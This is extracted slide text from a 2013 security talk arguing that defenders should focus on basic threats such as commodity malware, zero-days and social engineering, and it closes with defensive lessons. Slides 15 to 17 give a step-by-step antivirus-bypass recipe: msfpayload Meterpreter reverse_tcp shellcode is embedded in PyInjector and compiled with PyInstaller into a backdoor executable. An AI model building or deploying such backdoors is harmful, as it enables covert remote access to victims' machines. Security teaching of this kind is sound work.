3. The Need for Focus
• It is easy to get caught up in the latest “Hack of the
day”
• Let’s talk about
• iPhone attacks, Android Malware, Backdoors from chargers, DLP,
Hacking ATMs, breaking into drones, hacking obscure software X
• But, when we get popped, it is going to be something
simple
• Cool stuff is cool, but the basics will kill you
http://hacknaked.tv Copyright 2013
4. #1 Crappy Malware
• Had enough presentations on the “Not so
advanced persistent threat?”
• Somehow, the belief is if we can make fun of
the attackers skill level it makes us….???
• Better? Smarter?
• Why?
• Because…..
http://hacknaked.tv Copyright 2013
6. About that Malware
• It tends to be well
known
• It tends to have AV
signatures*
• Tracing it back to a
specific group can be
hard
• Anyone can download it
• It is not 1337 or even
31337 Just right
http://hacknaked.tv Copyright 2013
9. AV Bypass Made Easy
• Many of these tools
have options to export
to a raw string of hex
characters
• In fact, that does not
even matter
• We can use Ghost Writing
techniques
• Simply exporting and
re-importing as a script
does the trick
• Flame did this with Lua
This and cookies:
Why I pentest
http://hacknaked.tv Copyright 2013
14. Python Injection
• Another technique is to:
• Convert your payload into Raw output
• Import the Raw output into a python script
• Convert the Python script into an executable
• It is all because the text sections of an .exe not being
reviewed by many AV vendors
• They would have to write the signature for Python itself
• Not likely
• Great write up by Mark Baggett
• http://tinyurl.com/SANS-580-Python-AV-Bypass
http://hacknaked.tv Copyright 2013
15. Windows AV Bypass - Setup
• Create a Windows box with prerequisites
• Same as target (32-bit vs. 64-bit)
• Install Python:
http://www.python.org/
• Add Python to system PATH
• Install PyWin32:
http://sourceforge.net/projects/pywin32/
• Install PyInstaller:
http://www.pyinstaller.org/
• Download PyInjector:
https://www.trustedsec.com/files/pyinjector.zip
http://hacknaked.tv Copyright 2013
16. Windows AV Bypass - Config
• Extract files from PyInjector
• Move pyinjector.py into root of PyInstaller folder
• Use msfpayload to generate alphanumeric shellcode (on any
machine)
• msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d
http://hacknaked.tv Copyright 2013
'n' | more
• Make sure payload matches architecture!
• Within pyinjector.py:
• replace: shellcode = sys.argv[1]
• with: shellcode = '<msfpayload output>’
• where: <msfpayload output> = output from the above msfpayload
command
17. Windows AV Bypass - Compile
• While in the PyInstaller Directory:
• python utilsMakespec.py --onefile --noconsole pyinjector.py
• python utilsBuild.py pyinjector/pyinjector.spec
• New backdoor should be under:
• [PyInstaller]/pyinjector/dist/pyinjector.exe
• Rename the executable, deploy, profit
• Don’t forget your listener!!!
http://hacknaked.tv Copyright 2013
18. Or You Could Just Choose
Option 15
OOppttioionn 1155
http://hacknaked.tv Copyright 2013
19. #2 0-day Dejour
• Yeah, another favorite for attackers
• There is always another 0-day
• Attackers seem to jump on this bandwagon
fast and stay on it till it is no longer effective
• Why? Because it works
• They do a lot with volume
• What is your patch success percentage?
http://hacknaked.tv Copyright 2013
20. Lessons
• Black-list AV is easy to bypass
• In fact, we had to do it with Poison Ivy last
week
• Yeah, a piece of malware 5 years old
• The attackers will be exactly as advanced as
they need to be
• Which is not very advanced
http://hacknaked.tv Copyright 2013
21. Focus and Future Plans
• Hacker Guard Lesson: don’t just focus on
malware, focus on detecting an attacker’s
impact on a system
• Get away from Black List Security
• Now
• Right now
• .. I mean after this presentation
http://hacknaked.tv Copyright 2013
22. #3 Users Making “Mistakes”
• How could we have a
presentation without this?
• There is no way hackers
would be this successful
without users
• Ha Ha!!! Users are “dumb”
• Yeah..
• Right?
• Not so fast sparky
http://hacknaked.tv Copyright 2013
23. We are all Dumb
• Or, the pretexts for the attackers are getting
really, really good
• Some SE pretexts we use are not fair
• Major insurance company and a change of
coverage
• Linked-in merit badges
• If the attack is tailored, it is successful
http://hacknaked.tv Copyright 2013
26. Lessons
• Users are going to make mistakes
• Not because they are dumb
• Well, half of them are below average
• Because they are not trained
• And because the attackers are good
http://hacknaked.tv Copyright 2013
27. Focus and Future Plans
• Hacker Guard Lesson: Once again, focus on
attacker actions
• Limit the damage the user can do
• Implement Firewalls
• Implement Software Restriction Policies
• Implement Internet Whitelisting
• But don’t simply believe the user is stupid
• Train them: Securing the Human
http://hacknaked.tv Copyright 2013
28. Conclusions
• While bright shiny objects are bright and
shiny
• We need to come back to basics and
fundamentals
• We loose sight of that in this industry
http://hacknaked.tv Copyright 2013
29. OCM at Black
Hat
• Offensive
Countermeasures at
Black Hat 2013
• http://tinyurl.com/HN
TV-BH-2013
http://hacknaked.tv Copyright 2013
30. End of Line
• Hack Naked TV Episodes
• http://www.hacknaked.tv
• Watch us:
• Blip.tv: http://blip.tv/securityweekly
• YouTube: http://youtube.com/securityweeklytv
• Subscribe via iTunes:
• https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id121896233?mt=2
http://hacknaked.tv Copyright 2013